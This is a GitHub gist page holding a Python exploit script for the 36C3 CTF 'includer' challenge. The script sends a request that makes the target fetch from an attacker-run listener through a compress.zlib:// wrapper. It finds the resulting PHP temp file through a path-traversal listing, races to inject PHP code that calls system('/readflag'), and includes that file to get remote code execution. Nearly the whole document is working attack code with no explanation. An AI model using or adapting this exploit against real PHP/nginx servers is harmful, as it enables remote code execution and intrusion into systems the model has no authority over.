Skip to content

Instantly share code, notes, and snippets.

@ZeddYu ZeddYu/exp.py
Created Jan 7, 2020

Embed
What would you like to do?
exp for 36c3 includer
from pwn import *
import requests
import re
import threading
import time
for gg in range(100):
r = remote("192.168.34.1", 8004)
l = listen(8080)
data = '''name={}&file=compress.zlib://http://192.168.151.132:8080'''.format("a"*8050)
payload = '''POST / HTTP/1.1
Host: 192.168.34.1:8004
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:56.0) Gecko/20100101 Firefox/56.0
Content-Length: {}
Content-Type: application/x-www-form-urlencoded
Connection: close
Cookie: PHPSESSID=asdasdasd
Upgrade-Insecure-Requests: 1
{}'''.format(len(data), data).replace("\n","\r\n")
r.send(payload)
try:
r.recvuntil('your sandbox: ')
except EOFError:
print("[ERROR]: EOFERROR")
# l.close()
r.close()
continue
# dirname = r.recv(70)
dirname = r.recvuntil('\n', drop=True) + '/'
print("[DEBUG]:" + dirname)
# send trash
c = l.wait_for_connection()
resp = '''HTTP/1.1 200 OK
Date: Sun, 29 Dec 2019 05:22:47 GMT
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 534
Content-Type: text/html; charset=UTF-8
{}'''.format('A'* 5000000).replace("\n","\r\n")
c.send(resp)
# get filename
r2 = requests.get("http://192.168.34.1:8004/.well-known../"+ dirname + "/")
try:
tmpname = "php" + re.findall(">php(.*)<\/a",r2.text)[0]
print("[DEBUG]:" + tmpname)
except IndexError:
l.close()
r.close()
print("[ERROR]: IndexErorr")
continue
def job():
time.sleep(0.01)
phpcode = 'wtf<?php system("/readflag");?>';
c.send(phpcode)
t = threading.Thread(target = job)
t.start()
# file_get_contents and include tmp file
exp_file = dirname + "/" + tmpname
print("[DEBUG]:"+exp_file)
r3 = requests.post("http://192.168.34.1:8004/", data={'file':exp_file})
print(r3.status_code,r3.text)
if "wtf" in r3.text:
break
t.join()
r.close()
l.close()
#r.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.